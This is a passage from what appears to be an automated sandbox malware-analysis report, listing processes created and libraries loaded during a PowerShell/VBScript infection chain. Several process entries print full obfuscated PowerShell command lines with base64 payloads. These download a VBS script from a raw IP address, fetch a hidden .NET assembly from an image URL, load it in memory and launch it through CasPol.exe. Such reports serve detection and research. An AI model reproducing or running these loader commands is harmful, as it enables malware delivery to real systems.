hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.cmdline"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFAE8.tmp" "c:\Users\user\AppData\Local\Temp\gxlowwdn\CSC56436D359159402F8D448B12D32335C6.TMP"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovalsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptbase.dllJump to behavior
